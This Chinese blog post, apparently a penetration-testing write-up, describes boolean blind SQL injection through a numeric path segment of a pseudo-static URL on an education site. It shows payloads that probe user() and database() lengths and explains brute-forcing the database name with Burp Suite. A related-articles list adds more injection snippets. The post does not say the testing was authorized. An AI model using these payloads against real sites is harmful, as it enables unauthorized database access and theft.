干货!一次伪静态页面的SQL注入!白帽黑客实战 。

最新推荐文章于 2024-05-10 21:45:00 发布
最新推荐文章于 2024-05-10 21:45:00 发布
阅读量764 收藏 2
点赞数
文章标签: sql 数据库 网络 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60571990/article/details/127982736
版权

涉及技能点

  • SQL注入基础原理

  • 盲注常用函数及思路

  • burpsuite基础知识

过程记录

1.发现

在翻阅一EDU站点时,发现路径中带有明显的数字参数

好像与我们平时习惯的xxx.php?id=不同呃

2.尝试注入

按照以往习惯,先用order by探探底,结果翻车了…应该有自定义逻辑在过滤敏感关键词。

继续努力,峰回路转,耶~~~!

构造boolen等式时能够被带入查询语句并显示不同效果

当条件不符合时,71-false=71,显示71.html,无数据

http://EDU_SITE/.../..._id/71-false.html

=> SELECT ..FROM .. WHERE ... AND _id=71-false

而当条件符合时,71-true=70,显示70.html,有数据

http://EDU_SITE/.../..._id/71-true.html

=> SELECT ..FROM .. WHERE ... AND _id=71-true

3.确定攻击方式,获取数据进行验证

获取用户名长度

http://EDU_SITE/.../..._id/71-(length(user())=12).html

=> SELECT ..FROM .. WHERE ... AND _id=71-(length(user())=12)

获取数据库长度

http://EDU_SITE/.../..._id/71-(length(database())=6).html

=> SELECT ..FROM .. WHERE ... AND _id=71-(length(database())=6)

尝试用burpsuite的clusterboom模式对database进行爆破

其中参数1 为位数,参数2 为可能出现的字符明文

获得最终database()=db_cms

总结

在尝试sql注入的时候,往往过分关注get传参或者post传参而忽略了URL中自带的注入点,有时候一些明显的数字型参数也能够带入payload

零基础从入门到挖漏洞,其实也没那么难更多的是找不到适合自己的学习路线,从而踩了不少坑,以及还未形成独立的渗透思维,不得入门,就算花再多时间也与你无缘。想要学好渗透,最主要的还得是在找到一套对自己有益的教程,打下牢固的基础,在学习、打靶场的过程中,拓展自己的思维,从而慢慢形成一套自己的渗透思维.

小黑安全
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
SQL注入防御之一——静态(PHP)
心有猛虎,细嗅蔷薇!
08-22 2858
静态是相对真实静态来讲的,通常我们为了增强搜索引擎的友好面,都将文章内容生成静态页面,但是有的朋友为了实时的显示一些信息。或者还想运用动态脚本解决一些问题。不能用静态的方式来展示网站内容。但是这就损失了对搜索引擎的友好面。怎么样在两者之间找个中间方法呢,这就产生了静态技术。就是展示出来的是以html一类的静态页面形式,但其实是用PHP一类的动态脚本来处理的。。 概述 众所周知,web安全防御一直
静态网站渗透
Vdieoo的博客
10-30 1808
判断该站点是否静态静态即是网站本身是动态网页如.php、.asp、.aspx等格式动态网页有时这类动态网页还跟“?”加参数来读取数据库内不同资料。很典型的案例即是discuz论坛系统,后台就有一个设置静态功能,开启静态后,动态网页即被转换重写成静态网页类型页面,通过浏览器访问地址和真的静态页面没区别。前提服务器支持静态重写URL Rewrite功能 判断方法: 在浏览器里右键打开审查元素,控制台(console),输入代码或粘贴js代码 alert(do
如何正确的进行网站入侵渗透测试
最新发布
2401_84466361的博客
05-10 1081
大家都知道渗透测试就是为了证明网络防御按照预期计划正常运行而提供的一种机制,而且够独立地检查你的网络策略,一起来看看网站入侵渗透测试的正确知识吧。要检测一个站首先应先收集信息如whois信息、网站真实IP、旁注、C段网站、服务器系统版本、容器版本、程序版本、数据库类型、二级域名、防火墙、维护者信息有哪些等等1.用社工库里看看有没有泄露密码,然后尝试用泄露的密码进行登录后台。2.用邮箱做关键词,丢进搜索引擎。3.利用搜索到的关联信息找出其他邮进而得到常用社交账号。
一次简单SQL注入
ZIP123Y的博客
10-23 161
一次简单SQL注入 id大法 遇见id= 上去一个单引号 报错, 回显判断是MySQL数据库 and 1=1正常 and 1=2 不正常 数字型注入点没错了,还没有WAF 开始下手 order by 判断当前注入点有25个字段 回显 2 和 10 用database()替换2 version()替换10 开始爆当前数据库和版本 得到当前数据库跟版本,替换查询语句开始查询所有数据库 查询到只有两个库 SELECT group_concat(schema_name...
SQL注入之——静态注入
weixin_41657031的博客
07-15 2218
1.什么是静态注入? 答:“静态”顾名思义就是一种表面上看似是静态网页(以.html、.htm等结尾),不存在任何的数据交互,却其实是动态网页,存在数据交互的网站,具有这种特性的网页成为“静态网页”。我们看到的静态网页其实是经过处理的,将动态网页的id等参数通过URL重写来隐藏,让查看者以为是静态网页。展示出来的是以html一类的静态页面形式,但其实是用PHP一类的动态脚本来处理的。 2....
记一次简单的SQL注入
he320631127的博客
08-06 559
参考:http://103.238.227.13:10083/ bugku 可以看到编码是gb2312 测试注入点 id=1和id=1‘ 都没错 应该是宽字节注入,在试试 id=%df’ 报错 接着来 输入字段id=%df’ union select 1,2 %23 查看数据库的名 查看要找的key表里面的string ...
记一次sql注入实践
程序男的专栏
03-01 521
今天开发代码的时候发现自己的sql全是拼接的,不是where a = ?的那种,细思恐极啊,于是进行了一场sql注入实践。虽然失败了,但是还是得出了一些宝贵的经验。 首先从一个基础的分页查询语句开始分析: Select r.a,r.b  from role r where r.name like ‘role%’  order by r.create_time desc liimit 0,10;说明...
干货!这里有一份神经网络入门指导,请收下!
02-25
本文来自于微信号rgznai100,这份指导包含了...这里是一个灰度图片的集合,每个2×2的像素网格的像素取值都是在0()到255(黑)之间。我们的目标是构建一个模型,用“阶梯”的模式来识别图片。在这里,我们来探讨如何找
干货!MySQL资源大全共40页.pdf.zip
11-20
这份“干货!MySQL资源大全”很可能涵盖了以上诸多内容,对于初学者来说是一份宝贵的自学资料,而对于有经验的开发者来说,也可能会发现新的知识点和最佳实践。通过深入学习和实践,你可以提升MySQL的使用技能,更好...
干货!PLC的应用知识
01-20
一、简述多年来,可编程控制器(以下简称)从其产生到现在,实现了接线逻辑到存储逻辑的飞跃;其功能从弱到强,实现了逻辑控制到数字控制的进步;其应用领域从小到大,实现了单体设备简单控制到胜任、过程控制及集散...
基于静态分析的Java源代码SQL注入检测算法
10-17
研究了常见的SQL注入检测和源代码静态分析扫描的原理,提出Java源代码SQL注入检测算法,该算法通过对Java源代码词法分析和语法分析、建立抽象语法树、定义规则、遍历语法树和跟踪等,检测Java源代码中可能的SQL注入路径,测试结果表明,算法检测效果良好,识别率高。
静态sql注入
p_utao的博客
09-17 2829
静态是什么 静态是相对真实静态来讲的,通常我们为了增强搜索引擎的友好面,都将文章内容生成静态页面,但是有的朋友为了实时的显示一些信息。或者还想运用动态脚本解决一些问题。不能用静态的方式来展示网站内容。但是这就损失了对搜索引擎的友好面。怎么样在两者之间找个中间方法呢,这就产生了静态技术。静态技术是指展示出来的是以html一类的静态页面形式,但其实是用ASP一类的动态脚本来处理的。 静态验证 既然,我们了解什么是静态后,那么我们怎么判断一个网站是静态还是静态的呢? 首先我们可以根据网站最后的修
Web安全-静态网页
weixin_50464560的博客
09-28 1259
初步认识 “静态”顾名思义就是一种表面上看似是静态网页(以.html、.htm等结尾),不存在任何的数据交互,却其实是动态网页,存在数据交互的网站,具有这种特性的网页被称为“静态网页”。我们看到的静态网页其实是经过处理的,将动态网页的id等参数通过URL重写...
拦截静态资源.html(静态)
安逸llllll的博客
06-25 597
拦截静态资源.html(静态)
静态网站安全攻防如何理解
网站安全专家
04-08 3629
最近小伙伴问我说这个静态这个是怎么一回事,静态的这个网站的攻防要怎么做,那咱首先给大家先讲一讲静态是个什么东西。咱们一般网站都是分为静态和动态的,静态是什么,就比如说一些html页面组成的,就它是基本固定的,一般不会去变的那种内容动态,就是说根据你的不同请求来给你展示出不同的内容,那么对于seo,就是对于搜索引擎优化这些事来说,搜索引擎肯定是更喜欢静态网站的,所以精彩网站更容易做SEO提升我们的排名,那么有这种需求之后就出现了静态这么一个东西。 因为我们不可能做成真正静态,我们不可能一直.
什么是静态
冯攀强
01-28 2604
一、什么是静态技术?所谓静态的意思,就是地址中不带问号。二、为什么要用静态技术?Web应用程序最大的特点之一就是无状态,当一个页面跳转到另一个页面时,那么这个页面上的所有参数都将抛弃,所以动态页面一般利用url地址来保存其参数,就像:www.hcjxzsj.com/news.asp?id=1这样,搜索引擎在录取该页面时,可能会因为问号而进入死循环(以前动网就有这样一个漏洞
网站静态化——静态&SEO
void
01-06 7655
#什么是静态,静态作用   静态即是网站本身是动态网页如.php 、.asp 、 .aspx 等格式动态网页。有时这类动态网页还跟“?”加参数来读取数据库内不同资料。很典型的案例即是discuz论坛系统,后台就有一个设置静态功能,开启静态后,动态网页即被转换重写成静态网页类型页面,通过浏览器访问地址和真的静态页面没区别。前提服务器支持静态重写URL Rewrite 功能。 #需要静态...
mysql 中文乱码_干货!彻底解决MySQL中文乱码
06-01
MySQL 中文乱码问题可以从以下几个方面入手解决: 1. 数据库编码设置:要确保数据库编码与表编码与数据编码都是一致的,一般建议使用 UTF-8 编码。可以通过以下命令进行设置: ``` ALTER DATABASE database_name ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小黑安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值